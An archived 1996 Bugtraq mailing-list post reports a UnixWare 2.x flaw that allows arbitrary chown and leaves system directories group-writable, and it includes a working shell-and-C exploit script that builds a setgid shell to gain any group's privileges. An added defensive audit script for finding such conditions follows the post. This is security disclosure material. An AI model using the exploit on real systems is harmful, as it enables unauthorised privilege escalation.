Bugtraq mailing list archives
More on UnixWare 2.x vulnerability
From: tv () pobox com (Todd Vierling)
Date: Sat, 24 Aug 1996 14:48:48 -0400
I've found out more about UnixWare 2. It seems the system (and I don't know if SCO's own native OSs do this, SCO UNIX/SCO XENIX/SCO OpenServer) allows chown'ing a file *to* any arbitrary user and group.

Hm, lessee. Create a file that uses up all the available space in /tmp, then chown it root:bin. Okay, now someone else tell me who created that file.

Anyway, back to the setgid problem. I've found an exploit script (it's not all that difficult to do by hand, anyway...) on an FTP site pointed to by the floating post about this bug. It follows.

While browsing the default installation of UnixWare, it seems a couple *hundred* directories, including particularly /usr/bin, /sbin, and /usr/sbin, are writable by group. This is bad, very bad.

=====
#!/bin/sh
# cgroup - pick a group id for unixware (run as cgroup <groupid>)
cat >/tmp/.$$.c <<_end_
#include <unistd.h>
int main(void)
{
    setgid(getegid());
    execl("/bin/sh", "-", 0);
}
_end_
cc -o /tmp/.$$ /tmp/.$$.c
rm -f /tmp/.$$.c
chgrp $1 /tmp/.$$
chmod 6100 /tmp/.$$
/tmp/.$$
rm -f /tmp/.$$
=====

== Todd Vierling (Personal tv () pobox com; Business tv () iag net) Cast a vote! ==
== System administrator/technician, Internet Access Group, Orlando Florida ==
== Dialups in Orange, Volusia, Lake, Osceola counties - http://www.iag.net ==
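An audit for the conditions the message describes, added here as an example and not part of the original post: group-writable system directories, unrestricted chown, and leftover setuid/setgid files such as the mode 6100 binary the posted script creates in /tmp. The function names are hypothetical, and the sketch assumes a POSIX `find` and `getconf`.

```shell
#!/bin/sh
# Added audit example; function names are hypothetical, not from the post.

# Print every directory under the given roots that is writable by group.
# The post names /usr/bin, /sbin and /usr/sbin as examples of such roots.
group_writable_dirs() {
    for root in "$@"; do
        [ -d "$root" ] || continue
        find "$root" -xdev -type d -perm -020 -print 2>/dev/null
    done
}

# Print regular files under the given roots that carry the setuid or
# setgid bit (a mode 6100 file in /tmp would be reported here).
special_bit_files() {
    for root in "$@"; do
        [ -d "$root" ] || continue
        find "$root" -xdev -type f \( -perm -4000 -o -perm -2000 \) \
            -print 2>/dev/null
    done
}

# Report whether giving a file away with chown is restricted for the
# filesystem holding the given path, using the POSIX getconf path
# variable _POSIX_CHOWN_RESTRICTED. Prints "restricted",
# "giveaway-possible" or "unknown" (getconf missing or failing).
chown_restricted() {
    command -v getconf >/dev/null 2>&1 || { echo unknown; return 0; }
    val=$(getconf _POSIX_CHOWN_RESTRICTED "$1" 2>/dev/null) || val=unknown
    case "$val" in
        unknown)          echo unknown ;;
        ''|undefined|-1)  echo giveaway-possible ;;
        *)                echo restricted ;;
    esac
}

# Typical use on a host being reviewed:
#   group_writable_dirs /usr/bin /sbin /usr/sbin
#   special_bit_files /tmp /var/tmp
#   chown_restricted /tmp
```

Any directory the first function prints should be compared against the vendor's intended modes before being changed, since some group-writable directories are deliberate.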